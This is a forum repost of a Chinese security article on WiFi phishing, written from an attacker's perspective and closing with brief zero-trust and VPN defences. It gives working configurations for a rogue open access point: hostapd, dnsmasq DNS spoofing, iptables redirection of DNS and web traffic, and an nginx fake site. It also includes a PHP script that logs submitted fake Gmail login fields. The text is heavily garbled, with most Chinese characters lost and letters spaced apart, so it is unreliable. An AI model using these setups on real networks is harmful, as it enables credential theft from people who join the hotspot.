搜索

[16421] 2021-02-09_黑客视角揭秘WiFi钓鱼,零信任带来防护突破

文档创建者:s7ckTeam
浏览次数:22
最后更新:2025-01-18
2021-02-09_黑客视角揭秘WiFi钓鱼,零信任带来防护突破 W i F i   F r e e B u f   2 0 2 1 - 0 2 - 0 9 线 广 线 D N S C a p t i v e   P o r t a l J S 线 线 使 V P N 线 1 .   线 线 线 线 线 1 . 1   W i - F i 线 2 0 1 5 3 · 1 5 广   W i - F i   使 访 使 线   D E F C O N     W i r e l e s s   V i l l a g e   ( T h e   W a l l   o f   S h e e p ) :
1 . 2   l   2 0 0 0 l   线 l   X X X X W i F i 2 .   线 线 线 线 使 线   C a p t i v e   P o r t a l   访 线   A P   A t h e r o s   A R 9 2 7 1 A t h e r o s   R T L 8 8 1 2 2 . 1 线 线 h o s t a p d A P I E E E   8 0 2 . 1 1 I E E E   8 0 2 . 1 X W P A W P A 2 E A P O P E N o p e n . c o n f   i n t e r f a c e   线 s s i d   c h a n n e l   h w _ m o d e   线 g   I E E E   8 0 2 . 1 1 g o p e n . c o n f i n t e r f a c e = w l a n 0 s s i d = F r e e W i F i d r i v e r = n l 8 0 2 1 1 c h a n n e l = 1 h w _ m o d e = g
  D H C P     D N S   d n s m a s q     D N S     D H C P   / e t c / d n s m a s q . c o n f   D N S   / e t c / r e s o l v . c o n f     D N S     D H C P   2 . 2     F r e e   W i F i   C M C C S t a r B u c k s   线 线 线 广 线 广 线 2 0 0 4   D i n o   d a i   Z o v i     S h a n e   M a c a u l a y     K a r m a   K a r m a   H o m e     W o r k P r o b e   R e q u e s t     K a r m a     8 0 2 . 1 1     S S I D K a r m a 使 / e t c / d n s m a s q . c o n f d h c p - r a n g e = 1 7 2 . 5 . 5 . 1 0 0 ,   1 7 2 . 5 . 5 . 2 5 0 ,   1 2 h i n t e r f a c e = w l a n 0   h o s t a p d   使   A P     I P     h o s t a p d   n m c l i   r a d i o   w i f i   o f f r f k i l l   u n b l o c k   w l a n i f c o n f i g   w l a n 0   1 7 2 . 5 . 5 . 1 / 2 4 s y s t e m c t l   r e s t a r t   d n s m a s q h o s t a p d   o p e n . c o n f
线 W i F i   P i n e a p p l e 便   K a r m a   线   H a k 5     2 0 0 8 H a k 5     D a r r e n   K i t c h e n   P i n e a p p l e   i P h o n e A n d r o i d     W i - F i     W i F i   P i n e a p p l e   K a r m a   使   D i r e c t e d   P r o b e   R e q u e s t   使   S S I D     B r o a d c a s t   P r o b e   R e q u e s t   D i r e c t e d   P r o b e   R e q u e s t l   线 l   l   d e a u t h 使 线 线 2 . 3   线 线 使 使   I P     i p t a b l e s     N A T n e t w o r k   a d d r e s s   t r a n s l a t i o n s y s c t l   - w   n e t . i p v 4 . i p _ f o r w a r d = 1
使   W i r e s h a r k   T c p d u m p   线 D r i f t n e t   便 使   D r i f t n e t   2 . 4   D N S 线   D H C P     I P     D H C P     D N S     D N S   D N S   访   w w w . g o o g l e . c n   使 线 访 i p t a b l e s   - t   n a t   -   P O S T R O U T I N G   - o   e t h 0   - j   M A S Q U E R A D E d r i f t n e t   - i   w l a n 0
1   w w w . g o o g l e . c n   W e b     n g i n x   / e t c / n g i n x / s i t e s - e n a b l e / d e f a u l t ( 2 )     W e b     8 0   / v a r / w w w / f a k e s i t e     H T M L   W e b     n g i n x   访   1 7 2 . 5 . 5 . 1     D N S     d n s m a s q   / e t c / d n s m a s q . c o n f   a d d r e s s = / u r l / i p   U R L     I P     u r l   #   d n s m a s q   3 访   b a i d u . c o m s e r v e r   { l i s t e n   8 0   d e f a u l t _ s e r v e r ; r o o t   / v a r / w w w / f a k e s i t e ; i n d e x   i n d e x . h t m l l o c a t i o n   /   { t r y _ f i l e s   $ u r i   $ u r i /   / i n d e x . h t m l ; } } / e t c / d n s m a s q . c o n f a d d r e s s = / # / 1 7 2 . 5 . 5 . 1 s y s t e m c t l   r e s t a r t   n g i n x s y s t e m c t l   r e s t a r t   d n s m a s q
2 . 5   C a p t i v e   P o r t a l C a p t i v e   P o r t a l   线   i O S A n d r o i d W i n d o w s M a c   O S   X     C a p t i v e   P o r t a l     A n d r o i d   线 访 c l i e n t s 3 . g o o g l e .   c o m / g e n e r a t e _ 2 0 4 l     H T T P   2 0 4   l   H T T P   3 0 2   l   i O S W i n d o w s     C a p t i v e   P o r t a l   使 i p t a b l e s i p t a b l e s   N A T   n e t f i l t e r     i p t a b l e s   线 1   N A T     8 0     1 7 2 . 5 . 5 . 1     8 0     2 ~ 3     N A T     5 3   i p t a b l e s   - t   n a t   - A   P R E R O U T I N G   - i   w l a n 0   - p   t c p   d p o r t   8 0   - j   D N A T   t o - d e s t i n a t i o n   1 7 2 . 5 . 5 . 1 : 8 0 i p t a b l e s   - t   n a t   - A   P R E R O U T I N G   - i   w l a n 0   - p   u d p   d p o r t   5 3   - j   D N A T   t o - d e s t i n a t i o n   1 7 2 . 5 . 5 . 1 : 5 3 i p t a b l e s   - t   n a t   - A   P R E R O U T I N G   - i   w l a n 0   - p   t c p   d p o r t   5 3   - j   D N A T   t o - d e s t i n a t i o n   1 7 2 . 5 . 5 . 1 : 5 3
T C P U D P     1 7 2 . 5 . 5 . 1   5 3   H T T P   3 0 2 n g i n x / e t c / n g i n x / s i t e s - e n a b l e d / d e f a u l t   / v a r / w w w / h t m l     W e b   访   3 0 2     i n d e x . h t m l     P H P   使   P H P   使 G m a i l f o r m p o s t . p h p n g i n x   p h p   使 使 便 S i g n   i n   s e r v e r   { l i s t e n   8 0   d e f a u l t _ s e r v e r ; r o o t   / v a r / w w w / h t m l ; l o c a t i o n   /   { t r y _ f i l e s   $ u r i   $ u r i /   / i n d e x . h t m l ; } l o c a t i o n   ~   . p h p $   { i n c l u d e s n i p p e t s / f a s t c g i - p h p . c o n f ; f a s t c g i _ p a s s u n i x : / v a r / r u n / p h p / p h p 7 . 0 - f p m . s o c k ; } } # p o s t . p h p < ? p h p $ f i l e   =   ' l o g . t x t ' ; f i l e _ p u t _ c o n t e n t s ( $ f i l e ,   p r i n t _ r ( $ _ P O S T ,   t r u e ) ,   F I L E _ A P P E N D ) ; ? > < m e t a   h t t p - e q u i v = " r e f r e s h "   c o n t e n t = " 0 ;   u r l = . / . . "   / > s y s t e m c t l   r e s t a r t   n g i n x s y s t e m c t l   r e s t a r t   p h p 7 . 0 - f p m
W e b   l o g . t x t   2 . 6   l   P w n 2 o w n W i - F i   C a p t i v e   P o r t a l
l   2 0 1 8 C o d e B l u e R C E   w i t h   C a p t i v e   P o r t a l ) 线 W i n d o w s l   J S D N S h t t p s J S 访 J S 3 .   线 线 3 . 1   ( 1 )   W i - F i 线 ( 2 )   使 使 ( 3 )   使 W i - F i W i - F i ( 4 )   使 V P N 使 3 . 2   线 线 线 使 线 l   线 l   W I P S l   V P N 1 * * 线 * * R e d T e a m 线 8 0 线 线
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理